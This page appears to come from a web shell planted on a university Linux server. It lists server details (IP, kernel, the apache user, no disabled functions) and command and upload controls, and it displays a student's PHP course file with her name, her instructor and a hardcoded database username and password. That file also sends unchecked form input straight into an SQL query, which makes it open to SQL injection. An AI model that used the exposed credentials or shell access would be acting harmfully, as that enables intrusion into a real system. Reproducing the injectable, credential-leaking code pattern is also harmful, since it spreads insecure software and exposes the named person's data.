Server IP : 172.16.15.8 / Your IP : 13.59.112.169 Web Server : Apache System : Linux zeus.vwu.edu 4.18.0-553.27.1.el8_10.x86_64 #1 SMP Wed Nov 6 14:29:02 UTC 2024 x86_64 User : apache ( 48) PHP Version : 7.2.24 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON Directory (0755) : /home/sabarfield/www/ |
[ Home ] | [ C0mmand ] | [ Upload File ] |
---|
<!-- evaluationAction.php Author: Sydni Barfield Instructor: Dr. Wang Due: Sunday Apr. 21, 2024 --> <?php $gender = $_POST['gender']; $course = $_POST['course']; $grade = $_POST['grade']; $lect = $_POST['lect']; $student = $_POST['student']; $class = $_POST['class']; $host = 'localhost'; $user = 'sabarfield'; $passwd = 'cs389'; $database = 'sabarfield'; $connect = mysqli_connect($host, $user, $passwd); $query = "insert into EVALUATION values ('$gender', '$grade', '$course', '$lect', '$student', '$class')"; mysqli_select_db($connect, $database); if(mysqli_query($connect, $query)) { include ("Evaluationdisplay.php"); } else print "<P>Insert fail.<p>"; mysqli_close($connect); ?> <HR> <P> <center> <A HREF=index.html> HOME </A> | <A HREF=project5.html> Evaluation Home </A> </center>